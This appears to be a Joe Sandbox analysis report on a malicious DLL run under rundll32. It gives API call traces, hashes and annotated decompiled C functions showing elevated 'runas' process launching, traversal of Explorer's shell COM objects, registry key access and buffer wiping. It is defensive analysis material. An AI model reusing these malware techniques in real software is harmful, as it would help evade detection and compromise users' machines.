                                            • API ID: AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 556738718-0
                                            • Opcode ID: f6cb60965998f57d12a11ed18510c0b1d4b4031bb93f9b292dcf81a76a469a1c
                                            • Instruction ID: f7bb65a92e763d542b4c4c2d6394538315f28268af05bcfdf84c59783c0d0945
                                            • Opcode Fuzzy Hash: f6cb60965998f57d12a11ed18510c0b1d4b4031bb93f9b292dcf81a76a469a1c
                                            • Instruction Fuzzy Hash: 35216036600219AFDF11DF68C884B9EBFB9EF85314F1481A0ED44AB305D735E915CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05819C23: lstrlen.KERNEL32(?,00000000,?,00000027,05829208,?,00000000,?,?,?,?,?,0580BDC2,?,00000001), ref: 05819C59
                                              • Part of subcall function 05819C23: lstrcpy.KERNEL32(00000000,00000000), ref: 05819C7D
                                              • Part of subcall function 05819C23: lstrcat.KERNEL32(00000000,00000000), ref: 05819C85
                                            • RegOpenKeyExA.KERNEL32(0581CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,0581CC7F,80000001,?,05816085), ref: 058162BF
                                            • RegOpenKeyExA.ADVAPI32(0581CC7F,0581CC7F,00000000,00020019,80000001,?,0581CC7F,80000001,?,05816085), ref: 058162D5
                                            • RegCloseKey.KERNEL32(80000001,80000001,?,05816085,05816095,?,0581CC7F,80000001,?,05816085), ref: 0581631E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Open$Closelstrcatlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4131162436-0
                                            • Opcode ID: 28c7973d1c9b6d325f423db3bd33b11fc3cb222bb5dbb46563d655a9f1cb0558
                                            • Instruction ID: 5d2915c5a0c9325129ab3c07274744d85392669ff0737a1024645602fc25554c
                                            • Opcode Fuzzy Hash: 28c7973d1c9b6d325f423db3bd33b11fc3cb222bb5dbb46563d655a9f1cb0558
                                            • Instruction Fuzzy Hash: 8421F9B2A00209BFDF11EF96DC85CAEBFBDEB08214B104069FE05E7151E770AE559B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 47%
                                            			E049F4117(char* _a4, char** _a8) {
                                            				char* _t7;
                                            				char* _t11;
                                            				char* _t14;
                                            				char* _t16;
                                            				char* _t17;
                                            				char _t18;
                                            				signed int _t20;
                                            				signed int _t22;
                                            
                                            				_t16 = _a4;
                                            				_push(0x20);
                                            				_t20 = 1;
                                            				_push(_t16);
                                            				while(1) {
                                            					_t7 = StrChrA();
                                            					if(_t7 == 0) {
                                            						break;
                                            					}
                                            					_t20 = _t20 + 1;
                                            					_push(0x20);
                                            					_push( &(_t7[1]));
                                            				}
                                            				_t11 = E049F4DF6(_t20 << 2);
                                            				_a4 = _t11;
                                            				if(_t11 != 0) {
                                            					StrTrimA(_t16, 0x49f9284); // executed
                                            					_t22 = 0;
                                            					do {
                                            						_t14 = StrChrA(_t16, 0x20);
                                            						if(_t14 != 0) {
                                            							 *_t14 = 0;
                                            							do {
                                            								_t14 =  &(_t14[1]);
                                            								_t18 =  *_t14;
                                            							} while (_t18 == 0x20 || _t18 == 9);
                                            						}
                                            						_t17 = _a4;
                                            						 *(_t17 + _t22 * 4) = _t16;
                                            						_t22 = _t22 + 1;
                                            						_t16 = _t14;
                                            					} while (_t14 != 0);
                                            					 *_a8 = _t17;
                                            				}
                                            				return 0;
                                            			}

                                            APIs
                                            • StrChrA.SHLWAPI(?,00000020,00000000,04F795AC,?,?,049F6940,?,04F795AC), ref: 049F4133
                                            • StrTrimA.SHLWAPI(?,049F9284,00000002,?,049F6940,?,04F795AC), ref: 049F4151
                                            • StrChrA.SHLWAPI(?,00000020,?,049F6940,?,04F795AC), ref: 049F415C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Trim
                                            • String ID:
                                            • API String ID: 3043112668-0
                                            • Opcode ID: 4a214729d08908cf23de0094841b1a4f8825d49e2cdf7c9bc065af674863d612
                                            • Instruction ID: ab7fee97a783eacdb5f6190436cd6a025ce59970257c98c0344962c1c1edbc7d
                                            • Opcode Fuzzy Hash: 4a214729d08908cf23de0094841b1a4f8825d49e2cdf7c9bc065af674863d612
                                            • Instruction Fuzzy Hash: 3201BC713043666FE7204E2A9C44F637A9DEBF5354F040032BB55CB282DA30E802C760
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E049F3E6C(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                             				intOrPtr _v36;
                                             				intOrPtr _v44;
                                             				intOrPtr _v48;
                                             				intOrPtr _v52;
                                             				void _v60;
                                             				char _v64;
                                             				long _t14;
                                             				intOrPtr _t18;
                                             				intOrPtr _t19;
                                             				intOrPtr _t26;
                                             				intOrPtr _t27;
                                             				long _t28;
                                             
                                             				// Fragment of a launcher routine. The 0x3c-byte block at &_v64 is filled in the
                                             				// layout of SHELLEXECUTEINFOW on x86 (cbSize 0x3c, lpVerb at +0x0c, lpFile at +0x10,
                                             				// lpParameters at +0x14, nShow at +0x1c) and then passed, as the single argument, to
                                             				// an API reached through the import slot at 0x49fa100; that shape matches
                                             				// ShellExecuteExW. The field names in the comments below are inferred from the
                                             				// offsets and constants, not from symbols.
                                             				_t27 = __edi;
                                             				_t26 = _a8;
                                             				_t14 = E049F3C00(_a4, _t26, __edi); // executed
                                             				_t28 = _t14;
                                             				if(_t28 != 0) {
                                             					memset( &_v60, 0, 0x38); // zero +0x04..+0x3c of the block at &_v64
                                             					_t18 =  *0x49fa348; // 0x57d5a8 (base of the decoded data block; strings are addressed relative to it)
                                             					_t28 = 0;
                                             					_v64 = 0x3c; // +0x00 cbSize = sizeof(SHELLEXECUTEINFOW) on x86
                                             					if(_a12 == 0) {
                                             						_t7 = _t18 + 0x49fb4e8; // 0x70006f = UTF-16LE "op", consistent with L"open"
                                             						_t19 = _t7;
                                             					} else {
                                             						_t6 = _t18 + 0x49fb8ec; // 0x750072 = UTF-16LE "ru", consistent with L"runas" (elevated launch when _a12 != 0)
                                             						_t19 = _t6;
                                             					}
                                             					_v52 = _t19; // +0x0c lpVerb
                                             					_push(_t28);
                                             					_v48 = _a4; // +0x10 lpFile
                                             					_v44 = _t26; // +0x14 lpParameters
                                             					_v36 = _t27; // +0x1c nShow (taken from edi)
                                             					E049F37E9(); // called with 0 here and with 1 after the indirect call; its purpose is not visible in this listing
                                             					_push( &_v64); // the only argument: pointer to the structure built above
                                             					if( *0x49fa100() == 0) { // indirect call through a resolved import slot; a zero return is failure
                                             						_t28 = GetLastError(); // failure: return the Win32 error code
                                             					}
                                             					_push(1);
                                             					E049F37E9();
                                             				}
                                             				return _t28; // 0 on success (or when E049F3C00 returned 0), otherwise the error code
                                             			}

                                            APIs
                                              • Part of subcall function 049F3C00: SysAllocString.OLEAUT32(00000000), ref: 049F3C5A
                                              • Part of subcall function 049F3C00: SysAllocString.OLEAUT32(0070006F), ref: 049F3C6E
                                              • Part of subcall function 049F3C00: SysAllocString.OLEAUT32(00000000), ref: 049F3C80
                                            • memset.NTDLL ref: 049F3E8F
                                            • GetLastError.KERNEL32 ref: 049F3EDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocString$ErrorLastmemset
                                            • String ID: <
                                            • API String ID: 3736384471-4251816714
                                            • Opcode ID: a3e97b175bd97787d2b0e1852eea478b33e55042a60f8ec3c7ecfe530cdeedbe
                                            • Instruction ID: 67d29aec3a893fcdd56d77a096ed050bd96b7eb7ca2bcc31f52ba7e5de484dae
                                            • Opcode Fuzzy Hash: a3e97b175bd97787d2b0e1852eea478b33e55042a60f8ec3c7ecfe530cdeedbe
                                            • Instruction Fuzzy Hash: 9F014071A00218ABDB21EFA5DC88EDE7BBCAF48744F014435FE04E7200E779A9458B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegCreateKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BAD5
                                            • RegOpenKeyA.ADVAPI32(80000001,05D7B7F0,?), ref: 0581BADF
                                            • lstrlen.KERNEL32(05D7B7F0,00000000,00000000,0582806E,?,?,?,05806B9D,00000001,00000000,?), ref: 0581BAFE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateOpenlstrlen
                                            • String ID:
                                            • API String ID: 2865187142-0
                                            • Opcode ID: a0450831300758bae34b8e15beeb25197d875800b4381b934aa5ae7a3281f72d
                                            • Instruction ID: 620074dffcad3cc083b4e106a25ef47b420d760685e9e2c81f9eb121e29e91fc
                                            • Opcode Fuzzy Hash: a0450831300758bae34b8e15beeb25197d875800b4381b934aa5ae7a3281f72d
                                            • Instruction Fuzzy Hash: C1F09672200208BFEB219F90DC89EAB7F6CEB45795F10C005FD06D5140D6709D80CB75
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetEvent.KERNEL32(00000598,05819D32), ref: 05813ECA
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 058044F7
                                              • Part of subcall function 058044CE: RtlDeleteCriticalSection.NTDLL(05829400), ref: 0580452A
                                              • Part of subcall function 058044CE: RtlDeleteCriticalSection.NTDLL(05829420), ref: 05804531
                                              • Part of subcall function 058044CE: ReleaseMutex.KERNEL32(000005A8,00000000,?,?,?,05813ED5), ref: 0580455A
                                              • Part of subcall function 058044CE: CloseHandle.KERNEL32(?,?,05813ED5), ref: 05804566
                                              • Part of subcall function 058044CE: ResetEvent.KERNEL32(00000000,00000000,?,?,?,05813ED5), ref: 05804572
                                              • Part of subcall function 058044CE: CloseHandle.KERNEL32(?,?,05813ED5), ref: 0580457E
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 05804584
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 05804598
                                              • Part of subcall function 058044CE: HeapFree.KERNEL32(00000000,00000000,?,?,05813ED5), ref: 058045BC
                                              • Part of subcall function 058044CE: RtlRemoveVectoredExceptionHandler.NTDLL(056F05B8), ref: 058045F2
                                              • Part of subcall function 058044CE: SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 0580460E
                                            • CloseHandle.KERNEL32(00000598), ref: 05813EDF
                                            • HeapDestroy.KERNELBASE(05980000), ref: 05813EEF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                                            • String ID:
                                            • API String ID: 2773679374-0
                                            • Opcode ID: 70ab1d35326c546a307556586c99b52b149bd222daff552ebd126a4252eca8d5
                                            • Instruction ID: c5e4b2234a08a486b306c819d8a646e06db927dee2d0da10f6d8a56d9efb6737
                                            • Opcode Fuzzy Hash: 70ab1d35326c546a307556586c99b52b149bd222daff552ebd126a4252eca8d5
                                            • Instruction Fuzzy Hash: 60E04C707243059BDF60AB76A88EE573F9C7A145417084854FC46D2990EF65E8809A2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                             C-Code - Quality: 100%
                                             			E049F55D3(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                             				int _v12;
                                             				signed int _v16;
                                             				void* _v20;
                                             				signed char _v36;
                                             				void* _t24;
                                             				intOrPtr _t27;
                                             				void* _t35;
                                             				signed int _t38;
                                             				signed char* _t46;
                                             				int _t53;
                                             				void* _t55;
                                             				void* _t56;
                                             				void* _t57;
                                             
                                             				// _a4 points at a small record whose first byte is a length. The function copies the
                                             				// 0x110-byte global block at *0x49fa378 into a fresh heap buffer of (length + 0x110)
                                             				// bytes, optionally passes it through E049F29B5, hands it to E049F3072 and E049F17E5,
                                             				// and zeroes both buffers with memset before freeing them (E049F4C73, which pairs with
                                             				// the RtlAllocateHeap inside E049F4DF6). Wiping before free is the notable detail:
                                             				// neither the working copy nor the output buffer is left behind in the heap.
                                             				_v16 = _v16 & 0x00000000; // result; stays 0 unless E049F17E5 runs
                                             				_t46 = _a4;
                                             				_t53 = ( *_t46 & 0x000000ff) + 0x110; // allocation size: first byte of the record + 0x110
                                             				_v12 = 0x110;
                                             				_t24 = E049F4DF6(_t53); // heap allocation (RtlAllocateHeap, see the API list)
                                             				_a4 = _t24;
                                             				if(_t24 != 0) {
                                             					memcpy(_t24,  *0x49fa378, 0x110); // copy the global 0x110-byte template block
                                             					_t27 =  *0x49fa37c; // 0x0 in this dump
                                             					_t57 = _t56 + 0xc;
                                             					if(_t27 != 0) {
                                             						_t51 = _a4; // only assigned on this path but used below: decompiler artifact
                                             						E049F29B5(0x110, _a4, _a4, _t27, 0); // in-place transform of the copy, parameterised by *0x49fa37c
                                             					}
                                             					if(E049F66A9( &_v36) != 0) {
                                             						_t35 = E049F3072(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed; output buffer in _v20, its length in _v12
                                             						if(_t35 == 0) {
                                             							_t55 = _v20;
                                             							_v36 =  *_t46;
                                             							_t38 = E049F17E5(_t55, _a8, _t51, _t46, _a12); // executed
                                             							_v16 = _t38;
                                             							 *(_t55 + 4) = _v36;
                                             							_t20 =  &(_t46[4]); // 0xbf0845c7
                                             							memset(_t55, 0, _v12 - ( *_t20 & 0xf)); // wipe the output buffer (length reduced by the low nibble of record byte 4)
                                             							_t57 = _t57 + 0xc;
                                             							E049F4C73(_t55); // free the output buffer
                                             						}
                                             					}
                                             					memset(_a4, 0, _t53); // wipe the working copy before freeing it
                                             					E049F4C73(_a4);
                                             				}
                                             				return _v16;
                                             			}

                                            APIs
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • memcpy.NTDLL(00000000,00000110,?,?,?,?,049F6D90,?,049F58B7,049F58B7,?), ref: 049F5609
                                            • memset.NTDLL ref: 049F567F
                                            • memset.NTDLL ref: 049F5693
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memset$AllocateHeapmemcpy
                                            • String ID:
                                            • API String ID: 1529149438-0
                                            • Opcode ID: ca41e4a0050c1534b10d532a734d6374525b8c46adad20c6fdf7b374e97828ad
                                            • Instruction ID: 0db6c0bdff918a01d911217b2db4e59a7586a1e0b500aa593bf32027e14d8e9f
                                            • Opcode Fuzzy Hash: ca41e4a0050c1534b10d532a734d6374525b8c46adad20c6fdf7b374e97828ad
                                            • Instruction Fuzzy Hash: E8213D71A00618BBEF11AFA5CC41FEE7BBCAF88654F044025FA14A6251E734EA15CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058016A1: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016C0
                                              • Part of subcall function 058016A1: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,05829190,00000000,05813103,?,0580C793,?), ref: 058016CB
                                              • Part of subcall function 058016A1: _wcsupr.NTDLL ref: 058016D8
                                              • Part of subcall function 058016A1: lstrlenW.KERNEL32(00000000), ref: 058016E0
                                            • ResumeThread.KERNEL32(00000004,?,0580C793,?), ref: 05813111
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                            • String ID: v
                                            • API String ID: 3646851950-1801730948
                                            • Opcode ID: e2b50414927bf356fdd62d89dc496716a0cb2f6bfbafc44264b70c5307bc06c0
                                            • Instruction ID: 281f3ab451788f2e4783a81553ab4586f6ce325e1c87e1dbbca467dab2166cb6
                                            • Opcode Fuzzy Hash: e2b50414927bf356fdd62d89dc496716a0cb2f6bfbafc44264b70c5307bc06c0
                                            • Instruction Fuzzy Hash: 6CD05E34204301A6DA213720CD0EB267E96BF08B58F10CC24FD99D01B0DB358C509619
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                             C-Code - Quality: 38%
                                             			E049F1162(intOrPtr _a4) {
                                             				void* _v12;
                                             				char _v16;
                                             				void* _v20;
                                             				void* _v24;
                                             				void* _v28;
                                             				char _v32;
                                             				intOrPtr _v40;
                                             				void* _v46;
                                             				short _v48;
                                             				intOrPtr _t49;
                                             				void* _t51;
                                             				intOrPtr* _t53;
                                             				intOrPtr _t56;
                                             				void* _t58;
                                             				intOrPtr* _t59;
                                             				intOrPtr* _t61;
                                             				intOrPtr* _t63;
                                             				intOrPtr* _t65;
                                             				intOrPtr* _t67;
                                             				intOrPtr* _t69;
                                             				intOrPtr* _t71;
                                             				short _t73;
                                             				intOrPtr* _t74;
                                             				intOrPtr _t77;
                                             				intOrPtr* _t80;
                                             				intOrPtr _t82;
                                             				char* _t98;
                                             				intOrPtr _t100;
                                             				void* _t106;
                                             				void* _t108;
                                             				intOrPtr _t112;
                                             
                                             				// Walks the shell COM object chain from the Explorer-hosted window collection down to
                                             				// the active shell view of the desktop and QueryInterfaces that view for the interface
                                             				// the caller asked for (the pointer is stored through _a4). The method names in the
                                             				// comments are inferred from the vtable slot offsets, the argument shapes and the
                                             				// constants (4, 8, 1); the CLSID/IID/SID values live in the decoded data block at
                                             				// *0x49fa348 and are not visible in this listing.
                                             				_v48 = 0; // vt = VT_EMPTY; with the three stosd and one stosw this zeroes a 16-byte VARIANT at &_v48
                                             				asm("stosd");
                                             				asm("stosd");
                                             				asm("stosd");
                                             				asm("stosw");
                                             				_t49 =  *0x49fa348; // 0x57d5a8
                                             				_t4 = _t49 + 0x49fb450; // 0x4f789f8 (riid)
                                             				_t82 = 0; // loop index over the window collection
                                             				_t5 = _t49 + 0x49fb440; // 0x9ba05972 (rclsid)
                                             				_t51 =  *0x49fa170(_t5, 0, 4, _t4,  &_v20); // executed; (rclsid, pUnkOuter=0, dwClsContext=4 = CLSCTX_LOCAL_SERVER, riid, ppv) is the shape of CoCreateInstance
                                             				_t106 = _t51;
                                             				if(_t106 >= 0) {
                                             					_t53 = _v20;
                                             					_push( &_v12); // ppdispOut
                                             					_push(1); // swfwOptions = 1 = SWFO_NEEDDISPATCH
                                             					_push( &_v32); // phwnd
                                             					_push(8); // swClass = 8 = SWC_DESKTOP
                                             					_t98 =  &_v48;
                                             					_push(_t98); // pvarLocRoot (empty VARIANT)
                                             					_push(_t98); // pvarLoc (empty VARIANT)
                                             					_push(_t53); // executed
                                             					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) { // slot 15 of IShellWindows = FindWindowSW; S_OK means the desktop window was found
                                             						_t56 =  *0x49fa348; // 0x57d5a8
                                             						_t30 = _t56 + 0x49fb430; // 0x4f789d8 (riid)
                                             						_t31 = _t56 + 0x49fb460; // 0x4c96be40 (guidService)
                                             						_t58 =  *0x49fa10c(_v12, _t31, _t30,  &_v24); // executed; (punk, guidService, riid, ppv) is the shape of IUnknown_QueryService, which yields the window's browser object in _v24
                                             						_t106 = _t58;
                                             						_t59 = _v12;
                                             						 *((intOrPtr*)( *_t59 + 8))(_t59); // slot 2 = Release on the IDispatch returned by FindWindowSW
                                             						goto L11;
                                             					} else {
                                             						// FindWindowSW failed: fall back to enumerating every shell window
                                             						_t71 = _v20;
                                             						_v16 = 0;
                                             						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16); // slot 7 = IShellWindows::get_Count
                                             						if(_t106 >= 0) {
                                             							_t112 = _v16;
                                             							if(_t112 == 0) {
                                             								_t106 = 0x80004005; // E_FAIL: no shell windows at all
                                             								goto L11;
                                             							} else {
                                             								if(_t112 <= 0) {
                                             									L11:
                                             									if(_t106 >= 0) {
                                             										goto L12;
                                             									}
                                             								} else {
                                             									do {
                                             										_t73 = 3;
                                             										_v48 = _t73; // vt = VT_I4
                                             										_t74 = _v20;
                                             										_v40 = _t82; // lVal = current index
                                             										_t108 = _t108 - 0x10;
                                             										asm("movsd"); // the 16-byte VARIANT is passed by value
                                             										asm("movsd");
                                             										asm("movsd");
                                             										asm("movsd");
                                             										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12); // slot 8 = IShellWindows::Item(index, &pdisp)
                                             										if(_t106 < 0) {
                                             											goto L7;
                                             										} else {
                                             											_t77 =  *0x49fa348; // 0x57d5a8
                                             											_t23 = _t77 + 0x49fb430; // 0x4f789d8
                                             											_t24 = _t77 + 0x49fb460; // 0x4c96be40
                                             											_t106 =  *0x49fa10c(_v12, _t24, _t23,  &_v24); // same QueryService as above, on this window's IDispatch
                                             											_t80 = _v12;
                                             											 *((intOrPtr*)( *_t80 + 8))(_t80); // Release
                                             											if(_t106 >= 0) {
                                             												L12:
                                             												_t63 = _v24;
                                             												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28); // slot 15 of IShellBrowser = QueryActiveShellView(&psv)
                                             												if(_t106 >= 0) {
                                             													_t100 =  *0x49fa348; // 0x57d5a8
                                             													_t67 = _v28;
                                             													_t40 = _t100 + 0x49fb420; // 0x214e3 (riid)
                                             													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4); // slot 0 = QueryInterface(riid, ppv): the caller receives the requested interface of the desktop's active view through _a4
                                             													_t69 = _v28;
                                             													 *((intOrPtr*)( *_t69 + 8))(_t69); // Release the shell view
                                             												}
                                             												_t65 = _v24;
                                             												 *((intOrPtr*)( *_t65 + 8))(_t65); // Release the browser object
                                             											} else {
                                             												goto L7;
                                             											}
                                             										}
                                             										goto L15;
                                             										L7:
                                             										_t82 = _t82 + 1;
                                             									} while (_t82 < _v16);
                                             									goto L11;
                                             								}
                                             							}
                                             						}
                                             					}
                                             					L15:
                                             					_t61 = _v20;
                                             					 *((intOrPtr*)( *_t61 + 8))(_t61); // Release the window collection object
                                             				}
                                             				return _t106; // HRESULT
                                             			}
                                            0x049f1245
                                            0x00000000
                                            0x049f124a
                                            0x049f11e6
                                            0x049f11e4
                                            0x049f11db
                                            0x049f12c1
                                            0x049f12c1
                                            0x049f12c7
                                            0x049f12c7
                                            0x049f12d0

                                            APIs
                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F789D8,049F3C2E,?,?,?,?,?,?,?,?,?,?,?,049F3C2E), ref: 049F122F
                                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F789D8,049F3C2E,?,?,?,?,?,?,?,049F3C2E,00000000,00000000,00000000,006D0063), ref: 049F126D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: QueryServiceUnknown_
                                            • String ID:
                                            • API String ID: 2042360610-0
                                            • Opcode ID: 5f2eb99c227444fdcb82186759339e9e652d506670062e8b3a63b3f31da245bc
                                            • Instruction ID: af25c823f754bdab679a6d4a14566e27994f91561246d4a7199ed7b90f5990a9
                                            • Opcode Fuzzy Hash: 5f2eb99c227444fdcb82186759339e9e652d506670062e8b3a63b3f31da245bc
                                            • Instruction Fuzzy Hash: 0C514375900219EFCB00DFE8C889DEEB7B9FF88714B158569EA15EB210D770AD45CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E049F69D2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                            				void* _v8;
                                            				void* __esi;
                                            				intOrPtr* _t35;
                                            				void* _t40;
                                            				intOrPtr* _t41;
                                            				intOrPtr* _t43;
                                            				intOrPtr* _t45;
                                            				intOrPtr* _t50;
                                            				intOrPtr* _t52;
                                            				void* _t54;
                                            				intOrPtr* _t55;
                                            				intOrPtr* _t57;
                                            				intOrPtr* _t61;
                                            				intOrPtr* _t65;
                                            				intOrPtr _t68;
                                            				void* _t72;
                                            				void* _t75;
                                            				void* _t76;
                                            
                                            				_t55 = _a4;
                                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                                            				_a4 = 0;
                                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                            				if(_t76 < 0) {
                                            					L18:
                                            					return _t76;
                                            				}
                                            				_t40 = E049F1000(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                            				_t76 = _t40;
                                            				if(_t76 >= 0) {
                                            					_t61 = _a28;
                                            					if(_t61 != 0 &&  *_t61 != 0) {
                                            						_t52 = _v8;
                                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                            					}
                                            					if(_t76 >= 0) {
                                            						_t43 =  *_t55;
                                            						_t68 =  *0x49fa348; // 0x57d5a8
                                            						_t20 = _t68 + 0x49fb1fc; // 0x740053
                                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                            						if(_t76 >= 0) {
                                            							_t76 = E049F2898(_a4);
                                            							if(_t76 >= 0) {
                                            								_t65 = _a28;
                                            								if(_t65 != 0 &&  *_t65 == 0) {
                                            									_t50 = _a4;
                                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                            								}
                                            							}
                                            						}
                                            						_t45 = _a4;
                                            						if(_t45 != 0) {
                                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                            						}
                                            						_t57 = __imp__#6;
                                            						if(_a20 != 0) {
                                            							 *_t57(_a20);
                                            						}
                                            						if(_a12 != 0) {
                                            							 *_t57(_a12);
                                            						}
                                            					}
                                            				}
                                            				_t41 = _v8;
                                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                            				goto L18;
                                            			}

                                            APIs
                                              • Part of subcall function 049F1000: SysAllocString.OLEAUT32(80000002), ref: 049F105D
                                              • Part of subcall function 049F1000: SysFreeString.OLEAUT32(00000000), ref: 049F10C3
                                            • SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                            • SysFreeString.OLEAUT32(049F6ECE), ref: 049F6ABB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
